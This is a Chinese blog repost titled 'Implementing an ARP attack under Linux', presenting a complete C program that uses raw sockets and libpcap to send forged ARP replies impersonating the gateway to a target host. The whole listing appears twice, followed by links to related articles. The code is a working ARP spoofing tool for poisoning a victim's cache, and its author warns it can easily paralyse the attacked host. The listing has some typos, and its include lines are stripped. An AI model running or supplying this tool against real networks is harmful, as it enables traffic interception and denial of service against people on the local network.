linux下arp攻击的实现
来源:百度文库 编辑:神马文学网 时间:2024/05/24 05:26:10
公告:
《张亚勤:让智慧起舞》新书发布会观众召集中[意见反馈][官方博客] linux下arp攻击的实现 收藏
arp攻击,arp病毒曾经疯狂的流行了一阵子。
下面是简单的arp攻击原来的实现例子,只是一个示例,离真正的arp攻击还有一点距离,现在的arp攻击越来越隐蔽越来越高科技了。
(尽量少用,很容易使攻击的主机瘫痪)
view plaincopy to clipboardprint?
01.#include
02.#include
03.#include
04.#include
05.#include
06.#include
07.#include
08.#include
09.#include
10.#include
11.#include
12.#include
13.#include
14.#include
15.#include
16.#include
17.int sockfd;
18.struct sockaddr_ll peer_addr;
19.unsigned char my_ip[4] = {192, 168, 1,100}; //my ip address
20.unsigned char gateway_ip[4] = {192, 168, 1, 1}; //gateway ip address
21.unsigned char attack_ip[4] = {192, 168, 1, 8}; //ip address to be attacked
22.unsigned char my_mac[6] = {0x00,0x24,0x01,0x04,0x59,0x65 }; //my mac address
23.//封装arp包
24.struct arp_packet {
25. struct ether_header eh;
26. struct ether_arp arp;
27.};
28.//封装ip包
29.struct ip_packet{
30. struct ether_header eh;
31. struct iphdr ip;
32.};
33.void send_arp(const unsigned char* attack_ip);
34.void process_arppachet(struct arp_packet *packet);
35.void echo_head(char *);
36.void echo(char *);
37.void echo_end(char *);
38./**
39. * 发送arp包到攻击主机
40. */
41.void send_arp(const unsigned char* attack_ip) {
42. unsigned char broad_mac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};//发送广播包为了获取网关地址
43. //开始构造arp桢
44. struct arp_packet frame;
45. memcpy(frame.eh.ether_dhost, broad_mac, 6);
46. memcpy(frame.eh.ether_shost, my_mac, 6);
47. frame.eh.ether_type = htons(ETH_P_ARP);
48. frame.arp.ea_hdr.ar_hrd = htons(ARPHRD_ETHER);
49. frame.arp.ea_hdr.ar_pro = htons(ETH_P_IP);
50. frame.arp.ea_hdr.ar_hln = 6;
51. frame.arp.ea_hdr.ar_pln = 4;
52. frame.arp.ea_hdr.ar_op = htons(ARPOP_REQUEST);
53. memcpy(frame.arp.arp_sha, my_mac, 6);
54. memcpy(frame.arp.arp_spa, my_ip, 4);
55. memcpy(frame.arp.arp_tha, broad_mac, 6);
56. memcpy(frame.arp.arp_tpa, attack_ip, 4);
57. sendto(sockfd, &frame, sizeof(frame), 0, (struct sockaddr*)&peer_addr, sizeof(peer_addr));
58. printf("success send arp request to 192.168.1.%d\n", attack_ip[3]);
59.}
60./**
61. * 分析arp包
62. */
63.void process_arppacket(struct arp_packet *packet) {
64. echo_head("process_arppacket");
65. struct arp_packet *old_frame = packet;
66. struct arp_packet frame;
67. memcpy(&frame, packet, sizeof(frame));
68. int ar_op = ntohs(frame.arp.ea_hdr.ar_op);
69. // ------------------------------------arp frame info-------------------------------------------------------
70. if (ar_op == ARPOP_REQUEST)
71. printf("arp request\t");
72. if (ar_op == ARPOP_RREPLY)
73. printf("arp reply \t");
74. char ip_buf[128];
75. inet_ntop(AF_INET, &old_frame->arp.arp_spa, ip_buf, sizeof(ip_buf));
76. printf("[%s](%s)",
77. ether_ntoa((struct ether_addr *) &old_frame->arp.arp_sha), ip_buf);
78. printf("\t->\t");
79. memset(ip_buf, 0, sizeof(ip_buf));
80. inet_ntop(AF_INET, &old_frame->arp.arp_tpa, ip_buf, sizeof(ip_buf));
81. printf("[%s](%s)",
82. ether_ntoa((struct ether_addr *) &old_frame->arp.arp_tha), ip_buf);
83. printf("\n");
84.// ---------------------------------------------------------------------------------------------
85. if(ar_op == ARPOP_REPLY && (old_frame->arp.arp_spa)[3] == attack_ip[3] && (old_frame->arp.arp_tpa)[3] == my_ip[3]) { //normal arp reply from attack_ip
86. //bulid faked arp reply frame
87. memcpy(frame.eh.ether_dhost, old_frame->arp.arp_sha, 6);
88. memcpy(frame.eh.ether_shost, my_mac, 6);
89. frame.eh.ether_type = htons(ARPOP_REPLY);
90. memcpy(frame.arp.arp_tha, old_frame->arp.arp_sha, 6);
91. memcpy(frame.arp.arp_tpa, attack_ip, 4);
92. memcpy(frame.arp.arp_sha, my_mac, 6);
93. memcpy(frame.arp.arp_spa, gateway_ip, 4);
94. //send faked arp reply frame
95. sendto(sockfd, &frame, sizeof(frame), 0, (struct sockaddr*)&peer_addr, sizeof(peer_addr));
96. printf("success faked 192.168.1.%d \n", (old_frame->arp.arp_spa)[3]);
97. }
98. if(((ar_op == ARPOP_REQUEST) && (old_frame->arp.arp_spa)[3] == gateway_ip[3]) ||
99. (ar_op == ARPOP_REQUEST && (old_frame->arp.arp_spa)[3] == attack_ip[3] && (old_frame->arp.arp_tpa)[3] == gateway_ip[3])) { //case 2 a
100. sleep(1);
101. send_arp(attack_ip);
102. }
103.
104.}
105.void process_ippacket(struct iphdr *ip){
106. echo_head("process_ippacket");
107. struct in_addr addr;
108. addr.s_addr = ip->saddr;
109. printf("%s---->",inet_ntoa(addr));
110. addr.s_addr = ip->daddr;
111. printf("%s\n",inet_ntoa(addr));
112. int protocol = ip->protocol;
113. switch(protocol){
114. case IPPROTO_TCP:
115. printf("tcp\n");
116. break;
117. case IPPROTO_UDP:
118. printf("udp");
119. break;
120. case IPPROTO_SCTP:
121. break;
122. default:
123. printf("the protocol is:%d\n",protocol);
124. break;
125. }
126. echo_end("process_ippacket");
127.}
128.//pcap 回掉函数,用于监听网络上的数据包
129.void callback(unsigned char *args, const struct pcap_pkthdr *head,
130. const unsigned char *packet) {
131. struct ether_header *eh = (struct ether_header *) packet;
132. switch (ntohs(eh->ether_type))
133. {
134. case ETHERTYPE_ARP:
135. if (head->len > sizeof(struct ether_header) + sizeof(struct iphdr)) {
136. process_arppacket((struct arp_packet *) packet);
137. }
138. break;
139. case ETHERTYPE_IP:
140. if (head->len > sizeof(struct ether_header) + sizeof(struct iphdr)) {
141. process_ippacket((struct iphdr *)(packet+sizeof(struct ether_header)));
142. }
143. break;
144. default:
145. printf("ether type is:%x\n",eh->ether_type);
146. break;
147. }
148.}
149.//通过pcap监听网络情况
150.void *arp_listen(void *arg) {
151. char errbuf[1024];
152. char *dev= "wlan0";
153. pcap_t *handle = pcap_open_live(dev, 2048, 1, 1000, errbuf);
154. if(handle == NULL)printf("pcap_open_live():%s\n", errbuf);
155. unsigned int net,mask;
156. if(pcap_lookupnet(dev, &net, &mask, errbuf) == -1)printf("pcap_lookupnet():%s\n", errbuf);
157. struct bpf_program fp;
158. if(pcap_compile(handle, &fp, "arp or ip", 0, net) == -1)printf("pcap_compile():%s\n", errbuf);
159. if(pcap_setfilter(handle, &fp) == -1)printf("pcap_setfilter():%s\n", errbuf);
160. while(pcap_loop(handle, -1, callback, NULL) != -1);
161. return NULL;
162.}
163.int main(int argc, char **argv) {
164. pthread_t tid;
165. pthread_create(&tid, NULL, arp_listen, NULL);
166. sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP));
167. if(sockfd == -1)perror("socket()");
168. memset(&peer_addr, 0, sizeof(peer_addr));
169. peer_addr.sll_family = AF_PACKET;
170. struct ifreq req;
171. strcpy(req.ifr_name, "wlan0");
172. if(ioctl(sockfd, SIOCGIFINDEX, &req) != 0)perror("ioctl()");
173. peer_addr.sll_ifindex = req.ifr_ifindex;
174. peer_addr.sll_protocol = htons(ETH_P_ARP);
175. send_arp(attack_ip);//给攻击ip发送伪造的arp包
176. pthread_exit(NULL);//退出主线程
177. return 0;
178.}
179.void echo_head(char *str){
180. if(str==NULL){
181. return;
182. }
183. printf("------------------------------------------------BEGIN %s------------------------------------------------\n",str);
184.}
185.void echo(char *str){
186. if(str==NULL){
187. return;
188. }
189. printf("%s\n",str);
190.}
191.void echo_end(char *str){
192. if(str==NULL){
193. return;
194. }
195. printf("------------------------------------------------END %s------------------------------------------------\n",str);
196.}
本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/cangyingzhijia/archive/2009/11/05/4773230.aspx
《张亚勤:让智慧起舞》新书发布会观众召集中[意见反馈][官方博客] linux下arp攻击的实现 收藏
arp攻击,arp病毒曾经疯狂的流行了一阵子。
下面是简单的arp攻击原来的实现例子,只是一个示例,离真正的arp攻击还有一点距离,现在的arp攻击越来越隐蔽越来越高科技了。
(尽量少用,很容易使攻击的主机瘫痪)
view plaincopy to clipboardprint?
01.#include
02.#include
03.#include
04.#include
05.#include
06.#include
07.#include
08.#include
09.#include
10.#include
11.#include
12.#include
13.#include
14.#include
15.#include
16.#include
17.int sockfd;
18.struct sockaddr_ll peer_addr;
19.unsigned char my_ip[4] = {192, 168, 1,100}; //my ip address
20.unsigned char gateway_ip[4] = {192, 168, 1, 1}; //gateway ip address
21.unsigned char attack_ip[4] = {192, 168, 1, 8}; //ip address to be attacked
22.unsigned char my_mac[6] = {0x00,0x24,0x01,0x04,0x59,0x65 }; //my mac address
23.//封装arp包
24.struct arp_packet {
25. struct ether_header eh;
26. struct ether_arp arp;
27.};
28.//封装ip包
29.struct ip_packet{
30. struct ether_header eh;
31. struct iphdr ip;
32.};
33.void send_arp(const unsigned char* attack_ip);
34.void process_arppachet(struct arp_packet *packet);
35.void echo_head(char *);
36.void echo(char *);
37.void echo_end(char *);
38./**
39. * 发送arp包到攻击主机
40. */
41.void send_arp(const unsigned char* attack_ip) {
42. unsigned char broad_mac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};//发送广播包为了获取网关地址
43. //开始构造arp桢
44. struct arp_packet frame;
45. memcpy(frame.eh.ether_dhost, broad_mac, 6);
46. memcpy(frame.eh.ether_shost, my_mac, 6);
47. frame.eh.ether_type = htons(ETH_P_ARP);
48. frame.arp.ea_hdr.ar_hrd = htons(ARPHRD_ETHER);
49. frame.arp.ea_hdr.ar_pro = htons(ETH_P_IP);
50. frame.arp.ea_hdr.ar_hln = 6;
51. frame.arp.ea_hdr.ar_pln = 4;
52. frame.arp.ea_hdr.ar_op = htons(ARPOP_REQUEST);
53. memcpy(frame.arp.arp_sha, my_mac, 6);
54. memcpy(frame.arp.arp_spa, my_ip, 4);
55. memcpy(frame.arp.arp_tha, broad_mac, 6);
56. memcpy(frame.arp.arp_tpa, attack_ip, 4);
57. sendto(sockfd, &frame, sizeof(frame), 0, (struct sockaddr*)&peer_addr, sizeof(peer_addr));
58. printf("success send arp request to 192.168.1.%d\n", attack_ip[3]);
59.}
60./**
61. * 分析arp包
62. */
63.void process_arppacket(struct arp_packet *packet) {
64. echo_head("process_arppacket");
65. struct arp_packet *old_frame = packet;
66. struct arp_packet frame;
67. memcpy(&frame, packet, sizeof(frame));
68. int ar_op = ntohs(frame.arp.ea_hdr.ar_op);
69. // ------------------------------------arp frame info-------------------------------------------------------
70. if (ar_op == ARPOP_REQUEST)
71. printf("arp request\t");
72. if (ar_op == ARPOP_RREPLY)
73. printf("arp reply \t");
74. char ip_buf[128];
75. inet_ntop(AF_INET, &old_frame->arp.arp_spa, ip_buf, sizeof(ip_buf));
76. printf("[%s](%s)",
77. ether_ntoa((struct ether_addr *) &old_frame->arp.arp_sha), ip_buf);
78. printf("\t->\t");
79. memset(ip_buf, 0, sizeof(ip_buf));
80. inet_ntop(AF_INET, &old_frame->arp.arp_tpa, ip_buf, sizeof(ip_buf));
81. printf("[%s](%s)",
82. ether_ntoa((struct ether_addr *) &old_frame->arp.arp_tha), ip_buf);
83. printf("\n");
84.// ---------------------------------------------------------------------------------------------
85. if(ar_op == ARPOP_REPLY && (old_frame->arp.arp_spa)[3] == attack_ip[3] && (old_frame->arp.arp_tpa)[3] == my_ip[3]) { //normal arp reply from attack_ip
86. //bulid faked arp reply frame
87. memcpy(frame.eh.ether_dhost, old_frame->arp.arp_sha, 6);
88. memcpy(frame.eh.ether_shost, my_mac, 6);
89. frame.eh.ether_type = htons(ARPOP_REPLY);
90. memcpy(frame.arp.arp_tha, old_frame->arp.arp_sha, 6);
91. memcpy(frame.arp.arp_tpa, attack_ip, 4);
92. memcpy(frame.arp.arp_sha, my_mac, 6);
93. memcpy(frame.arp.arp_spa, gateway_ip, 4);
94. //send faked arp reply frame
95. sendto(sockfd, &frame, sizeof(frame), 0, (struct sockaddr*)&peer_addr, sizeof(peer_addr));
96. printf("success faked 192.168.1.%d \n", (old_frame->arp.arp_spa)[3]);
97. }
98. if(((ar_op == ARPOP_REQUEST) && (old_frame->arp.arp_spa)[3] == gateway_ip[3]) ||
99. (ar_op == ARPOP_REQUEST && (old_frame->arp.arp_spa)[3] == attack_ip[3] && (old_frame->arp.arp_tpa)[3] == gateway_ip[3])) { //case 2 a
100. sleep(1);
101. send_arp(attack_ip);
102. }
103.
104.}
105.void process_ippacket(struct iphdr *ip){
106. echo_head("process_ippacket");
107. struct in_addr addr;
108. addr.s_addr = ip->saddr;
109. printf("%s---->",inet_ntoa(addr));
110. addr.s_addr = ip->daddr;
111. printf("%s\n",inet_ntoa(addr));
112. int protocol = ip->protocol;
113. switch(protocol){
114. case IPPROTO_TCP:
115. printf("tcp\n");
116. break;
117. case IPPROTO_UDP:
118. printf("udp");
119. break;
120. case IPPROTO_SCTP:
121. break;
122. default:
123. printf("the protocol is:%d\n",protocol);
124. break;
125. }
126. echo_end("process_ippacket");
127.}
128.//pcap 回掉函数,用于监听网络上的数据包
129.void callback(unsigned char *args, const struct pcap_pkthdr *head,
130. const unsigned char *packet) {
131. struct ether_header *eh = (struct ether_header *) packet;
132. switch (ntohs(eh->ether_type))
133. {
134. case ETHERTYPE_ARP:
135. if (head->len > sizeof(struct ether_header) + sizeof(struct iphdr)) {
136. process_arppacket((struct arp_packet *) packet);
137. }
138. break;
139. case ETHERTYPE_IP:
140. if (head->len > sizeof(struct ether_header) + sizeof(struct iphdr)) {
141. process_ippacket((struct iphdr *)(packet+sizeof(struct ether_header)));
142. }
143. break;
144. default:
145. printf("ether type is:%x\n",eh->ether_type);
146. break;
147. }
148.}
149.//通过pcap监听网络情况
150.void *arp_listen(void *arg) {
151. char errbuf[1024];
152. char *dev= "wlan0";
153. pcap_t *handle = pcap_open_live(dev, 2048, 1, 1000, errbuf);
154. if(handle == NULL)printf("pcap_open_live():%s\n", errbuf);
155. unsigned int net,mask;
156. if(pcap_lookupnet(dev, &net, &mask, errbuf) == -1)printf("pcap_lookupnet():%s\n", errbuf);
157. struct bpf_program fp;
158. if(pcap_compile(handle, &fp, "arp or ip", 0, net) == -1)printf("pcap_compile():%s\n", errbuf);
159. if(pcap_setfilter(handle, &fp) == -1)printf("pcap_setfilter():%s\n", errbuf);
160. while(pcap_loop(handle, -1, callback, NULL) != -1);
161. return NULL;
162.}
163.int main(int argc, char **argv) {
164. pthread_t tid;
165. pthread_create(&tid, NULL, arp_listen, NULL);
166. sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP));
167. if(sockfd == -1)perror("socket()");
168. memset(&peer_addr, 0, sizeof(peer_addr));
169. peer_addr.sll_family = AF_PACKET;
170. struct ifreq req;
171. strcpy(req.ifr_name, "wlan0");
172. if(ioctl(sockfd, SIOCGIFINDEX, &req) != 0)perror("ioctl()");
173. peer_addr.sll_ifindex = req.ifr_ifindex;
174. peer_addr.sll_protocol = htons(ETH_P_ARP);
175. send_arp(attack_ip);//给攻击ip发送伪造的arp包
176. pthread_exit(NULL);//退出主线程
177. return 0;
178.}
179.void echo_head(char *str){
180. if(str==NULL){
181. return;
182. }
183. printf("------------------------------------------------BEGIN %s------------------------------------------------\n",str);
184.}
185.void echo(char *str){
186. if(str==NULL){
187. return;
188. }
189. printf("%s\n",str);
190.}
191.void echo_end(char *str){
192. if(str==NULL){
193. return;
194. }
195. printf("------------------------------------------------END %s------------------------------------------------\n",str);
196.}
本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/cangyingzhijia/archive/2009/11/05/4773230.aspx
linux下arp攻击的实现
Linux服务器如何防御ARP攻击
Linux下Sniffer程序的实现
解决ARP欺骗和攻击的方法
Windows下的ARP命令
什么是ARP攻击?如何防止ARP攻击?
Linux 下实现网卡高可用性的几种方法
基于Linux环境下的Sniffer设计与实现
Windows与VMware下的Linux文件如何实现共享
嵌入式Linux下NAND存储系统的设计与实现hxy
Linux 系统下双机HA的功能实现
关于网吧ARP攻击,MAC地址欺骗的解决方法
局域网安全:解决ARP攻击的方法和原理
浅谈局域网ARP攻击的危害及防范方法
局域网ARP攻击的危害及防范方法
Linux initcall的实现
ARP攻击原理及解决方法
CISCO DAI 防ARP攻击
为什么会出现ARP攻击
linux下C 插件(plugin)实现技术
如何在Linux下实现定时器
linux下C 插件(plugin)实现技术
Linux系统下防御 如何减轻DDOS攻击
如何在LINUX下实现硬件的自动检测(下)-Linux伊甸园----Linux|Unix|新闻|下载|论坛|人才|教程|自由软件|嵌入式|安装|开源|qq|RedHat|SUSE|命令|Mandriv